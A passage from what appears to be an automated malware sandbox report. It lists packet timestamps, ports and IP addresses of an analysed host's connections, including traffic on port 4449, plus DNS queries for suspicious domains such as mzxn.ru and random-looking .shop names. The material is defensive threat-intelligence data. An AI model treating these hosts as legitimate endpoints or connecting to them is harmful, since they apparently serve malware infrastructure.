Jul 27, 2024 07:46:38.664089918 CEST	443	62388	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:38.664165974 CEST	62388	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:38.664660931 CEST	62388	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:38.664691925 CEST	443	62388	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:38.997509003 CEST	62373	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 07:46:38.997817039 CEST	62389	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 07:46:39.003099918 CEST	4449	62373	193.222.96.24	192.168.2.4
Jul 27, 2024 07:46:39.003124952 CEST	4449	62389	94.156.79.190	192.168.2.4
Jul 27, 2024 07:46:39.003222942 CEST	62389	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 07:46:39.003578901 CEST	62389	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 07:46:39.008544922 CEST	4449	62389	94.156.79.190	192.168.2.4
Jul 27, 2024 07:46:39.292588949 CEST	443	62388	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:39.292707920 CEST	62388	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:39.294882059 CEST	62388	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:39.294903994 CEST	443	62388	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:39.294961929 CEST	62388	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:39.294974089 CEST	443	62388	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:39.295706034 CEST	443	62388	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:39.295844078 CEST	62388	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:39.336535931 CEST	443	62388	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:40.768837929 CEST	443	62388	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:40.768990040 CEST	443	62388	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:40.769068003 CEST	62388	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:40.784271955 CEST	62388	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:40.784271955 CEST	62388	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:40.784317017 CEST	443	62388	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:40.784344912 CEST	443	62388	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:40.898761988 CEST	62390	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:40.898845911 CEST	443	62390	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:40.899094105 CEST	62390	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:40.899431944 CEST	62390	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:40.899516106 CEST	443	62390	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:41.569912910 CEST	443	62390	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:41.570207119 CEST	62390	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:41.572283983 CEST	62390	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:41.572336912 CEST	443	62390	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:41.572402954 CEST	62390	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:41.572416067 CEST	443	62390	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:41.572704077 CEST	443	62390	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:41.572951078 CEST	62390	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:41.616575956 CEST	443	62390	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:42.449461937 CEST	62391	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:42.454957962 CEST	80	62391	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:42.455060959 CEST	62391	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:42.455167055 CEST	62391	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:42.455921888 CEST	62391	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:42.460236073 CEST	80	62391	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:42.465051889 CEST	80	62391	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:42.581854105 CEST	443	62390	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:42.582032919 CEST	443	62390	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:42.582310915 CEST	62390	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:42.596075058 CEST	62390	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:42.596075058 CEST	62390	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:42.596139908 CEST	443	62390	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:42.596177101 CEST	443	62390	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:42.711031914 CEST	62392	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:42.711112022 CEST	443	62392	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:42.711236954 CEST	62392	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:42.711776018 CEST	62392	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:42.711855888 CEST	443	62392	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:43.343899012 CEST	443	62392	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:43.344222069 CEST	62392	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:43.346259117 CEST	62392	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:43.346311092 CEST	443	62392	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:43.346390009 CEST	62392	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:43.346402884 CEST	443	62392	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:43.346673965 CEST	443	62392	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:43.346900940 CEST	62392	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:43.349023104 CEST	80	62391	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:43.349142075 CEST	80	62391	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:43.349201918 CEST	62391	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:43.349286079 CEST	62391	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:43.354296923 CEST	80	62391	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:43.392530918 CEST	443	62392	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:44.728167057 CEST	443	62392	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:44.728254080 CEST	443	62392	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:44.728436947 CEST	62392	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:44.747205973 CEST	62392	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:44.747205973 CEST	62392	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:44.747273922 CEST	443	62392	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:44.747309923 CEST	443	62392	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:44.851833105 CEST	62393	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:44.851916075 CEST	443	62393	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:44.852022886 CEST	62393	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:44.852549076 CEST	62393	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:44.852628946 CEST	443	62393	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:45.998364925 CEST	443	62393	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:45.998553038 CEST	62393	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:46.001071930 CEST	62393	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:46.001100063 CEST	443	62393	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:46.001267910 CEST	62393	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:46.001279116 CEST	443	62393	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:46.001455069 CEST	443	62393	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:46.001606941 CEST	62393	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:46.001638889 CEST	443	62393	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:47.248740911 CEST	443	62393	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:47.248931885 CEST	443	62393	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:47.249144077 CEST	62393	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:47.272587061 CEST	62393	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:47.272587061 CEST	62393	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:47.272649050 CEST	443	62393	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:47.272732973 CEST	443	62393	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:47.382957935 CEST	62394	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:47.383038998 CEST	443	62394	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:47.383394003 CEST	62394	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:47.384162903 CEST	62394	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:47.384246111 CEST	443	62394	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:48.178292036 CEST	443	62394	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:48.178447008 CEST	62394	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:48.180833101 CEST	62394	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:48.180886030 CEST	443	62394	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:48.180978060 CEST	62394	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:48.180989981 CEST	443	62394	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:48.181252956 CEST	443	62394	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:48.181490898 CEST	62394	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:48.224535942 CEST	443	62394	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:49.177678108 CEST	443	62394	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:49.177855968 CEST	443	62394	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:49.177947998 CEST	62394	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:49.192131996 CEST	62394	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:49.192177057 CEST	443	62394	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:49.192207098 CEST	62394	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:49.192223072 CEST	443	62394	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:49.304765940 CEST	62395	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:49.304846048 CEST	443	62395	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:49.304922104 CEST	62395	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:49.305386066 CEST	62395	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:49.305421114 CEST	443	62395	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:49.921549082 CEST	443	62395	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:49.921765089 CEST	62395	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:49.924176931 CEST	62395	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:49.924230099 CEST	443	62395	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:49.924309969 CEST	62395	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:49.924331903 CEST	443	62395	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:49.925110102 CEST	443	62395	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:49.925378084 CEST	62395	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:49.968539000 CEST	443	62395	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:51.268882990 CEST	443	62395	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:51.269037962 CEST	443	62395	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:51.269267082 CEST	62395	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:51.288048983 CEST	62395	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:51.288049936 CEST	62395	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:51.288111925 CEST	443	62395	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:51.288153887 CEST	443	62395	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:51.398722887 CEST	62396	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:51.398801088 CEST	443	62396	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:51.399056911 CEST	62396	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:51.399338007 CEST	62396	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:51.399383068 CEST	443	62396	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:52.005249023 CEST	443	62396	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:52.005522013 CEST	62396	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:52.008351088 CEST	62396	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:52.008404016 CEST	443	62396	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:52.008523941 CEST	62396	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:52.008538008 CEST	443	62396	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:52.008809090 CEST	443	62396	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:52.009043932 CEST	62396	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:52.056536913 CEST	443	62396	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:52.099212885 CEST	62397	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:52.104618073 CEST	80	62397	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:52.104707956 CEST	62397	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:52.104851007 CEST	62397	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:52.104901075 CEST	62397	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:52.110455990 CEST	80	62397	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:52.110485077 CEST	80	62397	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:53.005621910 CEST	80	62397	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:53.007040977 CEST	80	62397	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:53.007153034 CEST	62397	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:53.008831024 CEST	62397	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:53.013885975 CEST	80	62397	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:53.383368969 CEST	443	62396	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:53.383826017 CEST	443	62396	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:53.383958101 CEST	62396	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:53.397614956 CEST	62396	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:53.397615910 CEST	62396	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:53.397645950 CEST	443	62396	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:53.397665024 CEST	443	62396	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:53.508059025 CEST	62398	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:53.508137941 CEST	443	62398	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:53.508371115 CEST	62398	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:53.508833885 CEST	62398	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:53.508917093 CEST	443	62398	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:54.235302925 CEST	443	62398	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:54.235388994 CEST	62398	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:54.237778902 CEST	62398	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:54.237788916 CEST	443	62398	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:54.237833977 CEST	62398	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:54.237838984 CEST	443	62398	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:54.237879038 CEST	62398	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:54.237884045 CEST	443	62398	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:54.238116980 CEST	443	62398	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:54.238249063 CEST	62398	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:54.284539938 CEST	443	62398	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:55.142357111 CEST	443	62398	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:55.142517090 CEST	443	62398	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:55.142824888 CEST	62398	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:55.157252073 CEST	62398	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:55.157252073 CEST	62398	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:55.157315016 CEST	443	62398	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:55.157350063 CEST	443	62398	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:55.257838964 CEST	62399	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:55.257924080 CEST	443	62399	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:55.257997990 CEST	62399	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:55.258352995 CEST	62399	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:55.258372068 CEST	443	62399	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:56.661371946 CEST	443	62399	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:56.661469936 CEST	62399	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:56.663618088 CEST	62399	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:56.663640976 CEST	443	62399	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:56.663701057 CEST	62399	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:56.663712025 CEST	443	62399	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:56.664001942 CEST	443	62399	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:56.664208889 CEST	62399	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:56.708513021 CEST	443	62399	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:58.016088963 CEST	443	62399	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:58.016254902 CEST	443	62399	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:58.016423941 CEST	62399	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:58.030236959 CEST	62399	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:58.030236959 CEST	62399	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:58.030287981 CEST	443	62399	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:58.030359030 CEST	443	62399	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:58.133414984 CEST	62400	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:58.133493900 CEST	443	62400	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:58.133610010 CEST	62400	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:58.133959055 CEST	62400	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:58.133985996 CEST	443	62400	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:59.023221016 CEST	443	62400	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:59.023454905 CEST	62400	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:59.025594950 CEST	62400	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:59.025648117 CEST	443	62400	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:59.025713921 CEST	62400	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:59.025726080 CEST	443	62400	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:59.026459932 CEST	443	62400	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:59.026799917 CEST	62400	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:59.026885033 CEST	443	62400	107.173.160.139	192.168.2.4
Jul 27, 2024 07:47:00.166528940 CEST	443	62400	107.173.160.139	192.168.2.4
Jul 27, 2024 07:47:00.166671038 CEST	443	62400	107.173.160.139	192.168.2.4
Jul 27, 2024 07:47:00.166940928 CEST	62400	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:47:00.180882931 CEST	62400	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:47:00.180883884 CEST	62400	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:47:00.180955887 CEST	443	62400	107.173.160.139	192.168.2.4
Jul 27, 2024 07:47:00.181040049 CEST	443	62400	107.173.160.139	192.168.2.4
Jul 27, 2024 07:47:00.289271116 CEST	62401	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:47:00.289309025 CEST	443	62401	167.235.128.153	192.168.2.4
Jul 27, 2024 07:47:00.289413929 CEST	62401	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:47:00.289804935 CEST	62401	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:47:00.289817095 CEST	443	62401	167.235.128.153	192.168.2.4
Jul 27, 2024 07:47:00.420157909 CEST	4449	62389	94.156.79.190	192.168.2.4
Jul 27, 2024 07:47:00.420257092 CEST	62389	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 07:47:00.975621939 CEST	443	62401	167.235.128.153	192.168.2.4
Jul 27, 2024 07:47:00.975738049 CEST	62401	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:47:00.985129118 CEST	62401	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:47:00.985148907 CEST	443	62401	167.235.128.153	192.168.2.4
Jul 27, 2024 07:47:00.985217094 CEST	62401	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:47:00.985229015 CEST	443	62401	167.235.128.153	192.168.2.4
Jul 27, 2024 07:47:00.985460997 CEST	443	62401	167.235.128.153	192.168.2.4
Jul 27, 2024 07:47:00.985627890 CEST	62401	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:47:01.028574944 CEST	443	62401	167.235.128.153	192.168.2.4
Jul 27, 2024 07:47:02.375499964 CEST	443	62401	167.235.128.153	192.168.2.4
Jul 27, 2024 07:47:02.375643015 CEST	443	62401	167.235.128.153	192.168.2.4
Jul 27, 2024 07:47:02.375696898 CEST	62401	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:47:02.390752077 CEST	62401	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:47:02.390769958 CEST	443	62401	167.235.128.153	192.168.2.4
Jul 27, 2024 07:47:02.390784979 CEST	62401	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:47:02.390791893 CEST	443	62401	167.235.128.153	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2024 07:43:16.435106039 CEST	53	51392	1.1.1.1	192.168.2.4
Jul 27, 2024 07:43:17.664041996 CEST	57439	53	192.168.2.4	1.1.1.1
Jul 27, 2024 07:43:18.685139894 CEST	57439	53	192.168.2.4	1.1.1.1
Jul 27, 2024 07:43:19.677973032 CEST	57439	53	192.168.2.4	1.1.1.1
Jul 27, 2024 07:43:20.871543884 CEST	53	57439	1.1.1.1	192.168.2.4
Jul 27, 2024 07:43:20.871560097 CEST	53	57439	1.1.1.1	192.168.2.4
Jul 27, 2024 07:43:20.871570110 CEST	53	57439	1.1.1.1	192.168.2.4
Jul 27, 2024 07:44:01.041706085 CEST	63865	53	192.168.2.4	1.1.1.1
Jul 27, 2024 07:44:01.070944071 CEST	53	63865	1.1.1.1	192.168.2.4
Jul 27, 2024 07:44:14.730206966 CEST	50072	53	192.168.2.4	1.1.1.1
Jul 27, 2024 07:44:14.742911100 CEST	53	50072	1.1.1.1	192.168.2.4
Jul 27, 2024 07:44:22.216761112 CEST	62568	53	192.168.2.4	1.1.1.1
Jul 27, 2024 07:44:22.526438951 CEST	53	62568	1.1.1.1	192.168.2.4
Jul 27, 2024 07:44:24.616194010 CEST	63695	53	192.168.2.4	1.1.1.1
Jul 27, 2024 07:44:24.628540039 CEST	53	63695	1.1.1.1	192.168.2.4
Jul 27, 2024 07:44:25.364454985 CEST	53372	53	192.168.2.4	1.1.1.1
Jul 27, 2024 07:44:25.374327898 CEST	53	53372	1.1.1.1	192.168.2.4
Jul 27, 2024 07:44:33.029215097 CEST	62643	53	192.168.2.4	1.1.1.1
Jul 27, 2024 07:44:33.044087887 CEST	53	62643	1.1.1.1	192.168.2.4
Jul 27, 2024 07:45:52.155735016 CEST	52639	53	192.168.2.4	1.1.1.1
Jul 27, 2024 07:45:53.154910088 CEST	52639	53	192.168.2.4	1.1.1.1
Jul 27, 2024 07:45:54.213606119 CEST	52639	53	192.168.2.4	1.1.1.1
Jul 27, 2024 07:45:54.946281910 CEST	53	52639	1.1.1.1	192.168.2.4
Jul 27, 2024 07:45:54.946293116 CEST	53	52639	1.1.1.1	192.168.2.4
Jul 27, 2024 07:45:54.946295977 CEST	53	52639	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 27, 2024 07:43:17.664041996 CEST	192.168.2.4	1.1.1.1	0xd6fa	Standard query (0)	mzxn.ru	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:18.685139894 CEST	192.168.2.4	1.1.1.1	0xd6fa	Standard query (0)	mzxn.ru	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:19.677973032 CEST	192.168.2.4	1.1.1.1	0xd6fa	Standard query (0)	mzxn.ru	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:44:01.041706085 CEST	192.168.2.4	1.1.1.1	0x63f4	Standard query (0)	mussangroup.com	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:44:14.730206966 CEST	192.168.2.4	1.1.1.1	0xbc0a	Standard query (0)	funrecipebooks.com	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:44:22.216761112 CEST	192.168.2.4	1.1.1.1	0x5879	Standard query (0)	rentry.co	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:44:24.616194010 CEST	192.168.2.4	1.1.1.1	0x27b1	Standard query (0)	callosallsaospz.shop	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:44:25.364454985 CEST	192.168.2.4	1.1.1.1	0xf321	Standard query (0)	store4.gofile.io	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:44:33.029215097 CEST	192.168.2.4	1.1.1.1	0x8516	Standard query (0)	liernessfornicsa.shop	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:52.155735016 CEST	192.168.2.4	1.1.1.1	0x70cd	Standard query (0)	mzxn.ru	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:53.154910088 CEST	192.168.2.4	1.1.1.1	0x70cd	Standard query (0)	mzxn.ru	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.213606119 CEST	192.168.2.4	1.1.1.1	0x70cd	Standard query (0)	mzxn.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jul 27, 2024 07:43:20.871543884 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	186.145.236.93	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871543884 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	154.144.253.197	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871543884 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	190.218.33.19	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871543884 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	190.187.52.42	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871543884 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	190.249.193.233	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871543884 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	181.80.4.144	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871543884 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	190.98.23.157	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871543884 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	211.181.24.133	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871543884 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	175.119.10.231	A (IP address)	IN (0x0001)	false
